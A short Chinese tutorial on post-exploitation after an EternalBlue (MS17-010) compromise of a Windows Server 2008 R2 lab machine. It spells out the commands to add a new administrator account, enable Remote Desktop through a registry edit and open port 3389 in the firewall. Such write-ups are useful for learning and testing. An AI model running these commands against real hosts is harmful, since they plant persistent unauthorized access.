kali利用ms_17_010(永恒之蓝)渗透攻击window

参考文章:https://www.zengjunpeng.com/?id=142

测试环境:

  • 攻击机 kali 2019.1
  • 靶机 window server 2008 R2
  • 工具 nmap Metasploit

前几步,跟参考文章上相同,拿到 Windows 的命令行 shell 之后,为了能远程登录 window 主机,需要开放目标主机的 3389 端口和新建一个用户,将这部分内容,参考文章上没提到的,我在补充一下

1.创建window用户

在 shell 上执行命令中文返回乱码,是因为window主机默认GBK编码,linux默认utf8编码,所以会出现乱码,只需要将kali的终端编码改为GBK即可解决乱码问题

1
2
创建用户命令:
net user [username] [password]/add //注意密码要符合密码策略

2.将创建的用户添加到 administrators 组中

1
net localgroup administrators [username]/add

3.本地开放3389端口

1
2
3
4
5
1.开放3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

2.关闭3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

此时nmap扫描靶机的3389端口依然是关闭的

需要让防火墙开放3389端口

4.防火墙开放3389端口

1
netsh firewall set portopening TCP 3389 ENABLE //开放终端

此时 nmap 已经显示靶机的 3389 端口已经开放,可以进行远程登录